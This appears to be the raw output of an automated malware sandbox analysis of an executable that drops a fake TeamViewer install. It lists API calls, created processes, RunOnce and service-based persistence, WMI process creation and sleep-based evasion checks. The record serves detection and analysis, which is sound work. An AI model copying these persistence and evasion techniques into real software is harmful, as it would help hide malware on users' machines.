Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F3323B0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetCommandLineA,lstrcmpiA,lstrcmpiA,StrRChrA,wsprintfA,OpenEventA,CreateEventA,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess,6_2_6F3323B0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F337790 PostThreadMessageA,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageA,CreateThread,CallWindowProcW,6_2_6F337790
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F3319F0 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree,6_2_6F3319F0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33B1F0 NtSuspendThread,NtClose,6_2_6F33B1F0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33ADE0 NtProtectVirtualMemory,6_2_6F33ADE0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33AFC0 NtGetContextThread,NtSetContextThread,6_2_6F33AFC0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33AE20 NtOpenThread,6_2_6F33AE20
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F338400 NtQuerySystemInformation,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,NtWriteVirtualMemory,NtFlushInstructionCache,6_2_6F338400
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F331C00 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,6_2_6F331C00
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33B270 NtResumeThread,NtClose,HeapFree,6_2_6F33B270
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F332640 RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,6_2_6F332640
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33B0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,6_2_6F33B0A0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F334EF0 RtlZeroMemory,RtlZeroMemory,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,6_2_6F334EF0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F3314E0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,6_2_6F3314E0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33B2D0 RtlMoveMemory,NtFlushInstructionCache,6_2_6F33B2D0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F332ED0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessA,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,6_2_6F332ED0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F3318D0 NtProtectVirtualMemory,6_2_6F3318D0
Source: Teamviewer_Resource_ja.dll.1.dr Static PE information: No import functions for PE file found
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameTeamViewer.exel& vs 77Etc0bR2v.exe
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameTeamViewer_Resource.dll\ vs 77Etc0bR2v.exe
Source: 77Etc0bR2v.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: TeamViewer.exe.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F333700 OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,QueryServiceStatus,ControlService,Sleep,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle,2_2_6F333700
Source: 77Etc0bR2v.exe Virustotal: Detection: 37%
Source: 77Etc0bR2v.exe ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\77Etc0bR2v.exe File read: C:\Users\user\Desktop\77Etc0bR2v.exe
Source: 77Etc0bR2v.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Users\user\Desktop\77Etc0bR2v.exe 'C:\Users\user\Desktop\77Etc0bR2v.exe'
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: unknown Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\SysWOW64\svchost.exe c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'teamviewer.exe' -s USBManager
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: unknown Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F335B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,2_2_6F335B40
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_004C6E36 AdjustTokenPrivileges,3_2_004C6E36
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F335B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,3_2_6F335B40
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F335B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,6_2_6F335B40
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\77Etc0bR2v.exe File created: C:\Users\user\AppData\Roaming\TeamViewer
Source: C:\Users\user\Desktop\77Etc0bR2v.exe File created: C:\Users\user\AppData\Local\Temp\nso5B2E.tmp
Source: nso5B2F.tmp.1.drBinary string: Driver.GetDriverIPAddress.GetAdaptersInfo2.Error = Driver.GetDriverIPAddress.Memory allocation errorDriver.GetDriverIPAddress.GetAdaptersInfo.Error = Driver.NoSubkeys DriverConnector.GetGUIDfromRegistry: RegCloseKey(unit_key) failed with error DriverConnector.GetGUIDfromRegistry: RegQueryValueEx(component_id_string) failed with error DriverConnector.GetGUIDfromRegistry: RegQueryValueEx(net_cfg_instance_id_string) failed with error DriverConnector.GetGUIDfromRegistry: RegCloseKey(adapter_key) failed with error Driver.KeyError ComponentIdDriver.NoRegKey SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}DriverConnector.RemoveIPAddresses: DeleteIPAddress() failed with error DriverConnector.Close: CloseHandle failed\DEVICE\TCPIP_CDriverConnector::Init() GetIndex failed DriverConnector.Init: GetGUIDfromRegistry failedDriverConnector.Open: FlushIpNetTable failed with error DriverConnector.Open: IpRenewAddress failed with error Driver.Invalid.IPDriver.TAP_IOCTL_SET_MEDIA_STATUS.RejectedDriver.GetMAC.FailedDriver.DHCP.Failed1.0.0.7255.0.0.0DriverConnector.Open: DeviceIOControl(MTU) failedDriverConnector.Open: CreateFile failed with error \\.\Global\.dgt
Source: classification engine Classification label: mal76.evad.winEXE@14/11@4/4
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F3329D0 CoInitializeEx,CoCreateInstance,SysAllocString,SysAllocString,SysFreeString,CoSetProxyBlanket,SysAllocString,SysAllocString,SysFreeString,VariantInit,VariantInit,lstrlenW,SysAllocStringLen,GetProcessHeap,HeapFree,PathQuoteSpacesW,VariantInit,SysAllocString,GetProcessHeap,HeapFree,VariantInit,SysAllocString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,2_2_6F3329D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,wsprintfA,RegSetValueExA,wsprintfA,CreateServiceA,ChangeServiceConfig2A,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,lstrlenA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RtlZeroMemory,RegQueryValueExA,lstrcmpiA,RegSetValueExA,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,CloseServiceHandle,CloseServiceHandle,2_2_6F333C60
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,wsprintfA,RegSetValueExA,wsprintfA,CreateServiceA,ChangeServiceConfig2A,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,lstrlenA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RtlZeroMemory,RegQueryValueExA,lstrcmpiA,RegSetValueExA,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,CloseServiceHandle,CloseServiceHandle,3_2_6F333C60
Source: C:\Windows\SysWOW64\svchost.exeCode function: OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,wsprintfA,RegSetValueExA,wsprintfA,CreateServiceA,ChangeServiceConfig2A,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,lstrlenA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RtlZeroMemory,RegQueryValueExA,lstrcmpiA,RegSetValueExA,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,CloseServiceHandle,CloseServiceHandle,6_2_6F333C60
Source: C:\Users\user\Desktop\77Etc0bR2v.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolder,762AA680,lstrcmpi,lstrcat,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,1_2_00404356
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F3396D0 SwitchDesktop,SetThreadDesktop,LoadLibraryA,GetProcessHeap,HeapAlloc,GetProcessHeap,RtlZeroMemory,GetSystemDirectoryA,PathAddBackslashA,lstrcatA,LoadLibraryExA,LoadStringW,LoadStringW,LoadStringW,LoadStringW,FormatMessageW,LoadStringW,wsprintfW,FormatMessageW,FreeLibrary,wsprintfW,GetLastError,GetProcessHeap,HeapAlloc,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,WritePrivateProfileStringW,CoTaskMemFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,Sleep,SwitchDesktop,SetThreadDesktop,Sleep,2_2_6F3396D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F3337D0 QueryServiceConfigA,QueryServiceConfigA,GetProcessHeap,HeapAlloc,QueryServiceConfigA,ChangeServiceConfigA,GetProcessHeap,HeapFree,QueryServiceStatus,StartServiceA,2_2_6F3337D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Mutant created: \Sessions\1\BaseNamedObjects\DynGateInstanceMutexH1
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Mutant created: \Sessions\1\BaseNamedObjects\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flagMKKJJIAAADFBAAAA
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Mutant created: \Sessions\1\BaseNamedObjects\TeamViewer3_Win32_Instance_MutexH1
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Mutant created: \Sessions\1\BaseNamedObjects\TeamViewer_Win32_Instance_MutexH1
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F334E50 FindResourceW,LoadResource,SizeofResource,LockResource,GetProcessHeap,HeapAlloc,RtlMoveMemory,FreeResource,2_2_6F334E50
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe File created: C:\Program Files (x86)\QS
Source: C:\Users\user\Desktop\77Etc0bR2v.exe File written: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.ini
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: 77Etc0bR2v.exeStatic file information: File size 1828192 > 1048576
Source: 77Etc0bR2v.exeStatic PE information: certificate valid
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000000.363681783.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000000.390922597.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.460385781.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.475864917.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.472094268.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000000.363681783.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000000.390922597.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.460385781.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.475864917.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.472094268.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp, svchost.exe, 00000006.00000002.748672807.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.467680448.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.479287656.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.475980706.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485151608.000000006F33D000.00000002.00020000.sdmp, nso5B2F.tmp.1.dr
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33C101 push ecx; ret 2_2_6F33C114
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_0075C004 push ebp; retf 3_2_0075C018
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_0053E60D push ecx; ret 3_2_0053E620
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_0053BD8D push ecx; ret 3_2_0053BDA0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_0075BFE4 push ebp; retf 3_2_0075C018
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33C101 push ecx; ret 3_2_6F33C114
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33C101 push ecx; ret 6_2_6F33C114
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 11_2_026F4DB0 push esi; ret 11_2_026F4DB1
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 12_3_02721B50 push ecx; retf 12_3_02721B3A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 12_3_02725320 push ecx; iretd 12_3_02725322
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 12_3_026F703A push ecx; ret 12_3_026F7042
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,1_2_00405E88

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\77Etc0bR2v.exe File created: C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe File created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Source: C:\Users\user\Desktop\77Etc0bR2v.exe File created: C:\Users\user\AppData\Roaming\TeamViewer\TV.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F3344D0 GetPrivateProfileIntA,GetProcessHeap,HeapAlloc,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,WritePrivateProfileStringA,RtlZeroMemory,SHFileOperationA,GetProcessHeap,HeapFree,2_2_6F3344D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_004E177C __EH_prolog3,GetModuleFileNameW,PathRemoveFileSpecW,_wcscat_s,_memset,GetPrivateProfileStringW,3_2_004E177C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F3344D0 GetPrivateProfileIntA,GetProcessHeap,HeapAlloc,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,WritePrivateProfileStringA,RtlZeroMemory,SHFileOperationA,GetProcessHeap,HeapFree,3_2_6F3344D0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F3344D0 GetPrivateProfileIntA,GetProcessHeap,HeapAlloc,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,WritePrivateProfileStringA,RtlZeroMemory,SHFileOperationA,GetProcessHeap,HeapFree,6_2_6F3344D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\USBManager\Parameters
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F3337D0 QueryServiceConfigA,QueryServiceConfigA,GetProcessHeap,HeapAlloc,QueryServiceConfigA,ChangeServiceConfigA,GetProcessHeap,HeapFree,QueryServiceStatus,StartServiceA,2_2_6F3337D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exe
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_004FB7F9 3_2_004FB7F9
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_004DC9D6 3_2_004DC9D6
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_00500C6A 3_2_00500C6A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_004FFF68 3_2_004FFF68
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe TID: 5560 Thread sleep count: 269 > 30
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe TID: 5560 Thread sleep time: -134500s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5264 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5720 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33B0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,2_2_6F33B0A0
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_004FFF68 3_2_004FFF68
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: __EH_prolog3,GetAdaptersInfo,_malloc,GetAdaptersInfo,3_2_004B9A29
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: GetAdaptersInfo,3_2_6F3382F0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00405E61 FindFirstFileA,FindClose,1_2_00405E61
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_0040263E FindFirstFileA,1_2_0040263E
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_0040548B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F332DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,2_2_6F332DF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F3328B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,2_2_6F3328B0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_004BF3A9 __EH_prolog3,GetVolumeInformationW,FindFirstFileW,FindClose,FindFirstFileW,FindClose,GetVolumeInformationW,3_2_004BF3A9
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_0050331C __EH_prolog3_catch,FindFirstFileW,GetLastError,__CxxThrowException@8,FindClose,3_2_0050331C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F332DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,3_2_6F332DF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F3328B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,3_2_6F3328B0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F332DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,6_2_6F332DF0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F3328B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,6_2_6F3328B0
